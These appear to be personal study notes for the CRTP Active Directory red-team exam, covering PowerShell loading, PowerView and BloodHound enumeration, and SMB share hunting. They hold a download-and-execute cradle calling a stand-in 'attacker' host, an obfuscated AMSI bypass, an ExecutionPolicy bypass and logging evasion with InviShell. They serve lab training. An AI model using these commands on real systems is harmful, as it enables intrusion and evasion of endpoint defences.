# CRTP notes to pass an exam 

## Windows

:toc:
:toclevels: 3

== Table of Contents
- <<overview,Overview>>
- <<scripts, PowerShell Scripts>>
- <<file, File Transfering>>
- <<amsi, AmsiTrigger>>
- <<InviShell, InviShell>>
- <<PowerView, PowerView>>
- <<bloodhound, Bloodhound>>
- <<smbshare, Write SMB>>



[[overview]]
== Overview

It will be a compressed notes with commands , expoitation and some explanation. I wish that i pass CRTP with my methodology and this notes

[[scripts]]
== PowerShell Scripts

Load a PowerShell script using dot sourcing

```bash
. C:\AD\Tools\PowerView.ps1
```

A module (or a script) can be imported with:

```bash
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
```

All the commands in a module can be listed with

```bash
Get-Command -Module <modulename>
```

[[file]]
== File Transfering

Download file to target machine and execute it in *MEMORY* that means that file is not downloaded to disk

```bash
iex (New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')
```

The same but anouther way 

```bash
iex (iwr 'http://attacker/payload.ps1')
```

If Windows alert this `running scripts is disabled` we need to bypass by commands below. So it's a protect of random script execution *ExecutionPolicy*

```bash
powershell -ExecutionPolicy bypass
```

[[amsi]]
== AmsiTrigger

find AMSI detection triggers in PowerShell scripts

```bash
AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1
```

AMSI bypass

```bash
S`eT-It`em ( 'V'+'aR' +  'IA' + (("{1}{0}"-f'1','blE:')+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

[[InviShell]]
== InviShell

InviShell is used to Bypass PowerShell security logging.

```bash
cd \AD\Tools
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
```

[[PowerView]]
== PowerView

PowerView is used for an Active Directory enumeration so it is very powerfull tool. Run a `PowerView` in `Invisi-Shell` to avoid logging 

Return all users in a domain and info LDAP

```bash
Get-DomainUser
```

To list only a names *samaccountname*

```bash
Get-DomainUser | select -ExpandProperty samaccountname
```

To enumerate member computers in the domain we can use Get-DomainComputer

```bash
Get-DomainComputer | select -ExpandProperty dnshostname
```

See datails about a group

```bash
Get-DomainGroup -Identity "Domain Admins"
```

Members of a group

```bash
Get-DomainGroupMember -Identity "Domain Admins"
```

Return all users and groups which exist in target 

```bash
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local
```

Enumerate ACLs for the Domain Admins Group

```bash
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
```

Find ACLs which user `studentx` has

```bash
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "studentx"}
```

Check ACLs for a `RDPUsers` group

```bash
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
```

List all the OUs and only names of OUs

```bash
Get-DomainOU
Get-DomainOU | select -ExpandProperty name
```

List all computers in `DevOps` OU

```bash
(Get-DomainOU -Identity DevOps).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
```

List a GPOs and list a single GPO info

```bash
Get-DomainGPO
Get-DomainGPO -Identity '{0BF8D01C-1F62-4BDC-958C-57140B67D147}'
```

Find which GPOs are linked to an OU.

```bash
(Get-DomainOU -Identity DevOps).gplink
```

Enumerate all domains in the current forest

```bash
Get-ForestDomain -Verbose
```

Map all trusts of the domain

```bash
Get-DomainTrust
```

Enumerate trust relationships between domains.TrustAttributes = FILTER_SIDS -> SID filtering is enabled.

```bash
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
```

Identify external trusts with SID filtering enabled.

```bash
Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
```

Enumerate trusts for eurocorp.local forest

```bash
Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name}
```

[[bloodhound]]
== Bloodhound

Install and start `neo4j` 

```bash
neo4j.bat install-service
neo4j.bat start
```

Default username and password

```bash
neo4j : neo4j
```

Open Bloodhound and run `BloodHound.exe`

```bash
C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64
```

Collect all info abount domain by `SharpHound.exe`

```bash
C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors\SharpHound.exe --collectionmethods Group,GPOLocalGroup,Session,Trusts,ACL,Container,ObjectProps,SPNTargets --excludedcs
```

After AMSI bypassing it will be possible to collect info with an `Invoke-BloodHound`

```bash
Invoke-BloodHound -CollectionMethod All
```

[[smbshare]]
== Write SMB

Don't scan a DC to be more `OPSEC`. Also do this in `Invisi-Shell`. `PowerHuntShares.psm1` is used to find a `SMB Shares` in computers where current user has a write permissions

Import

```bash
Import-Module C:\AD\Tools\PowerHuntShares.psm1
```

Execution

```bash
Invoke-HuntSMBShares -NoPing -OutputDirectory C:\AD\Tools\ -HostList C:\AD\Tools\servers.txt
```







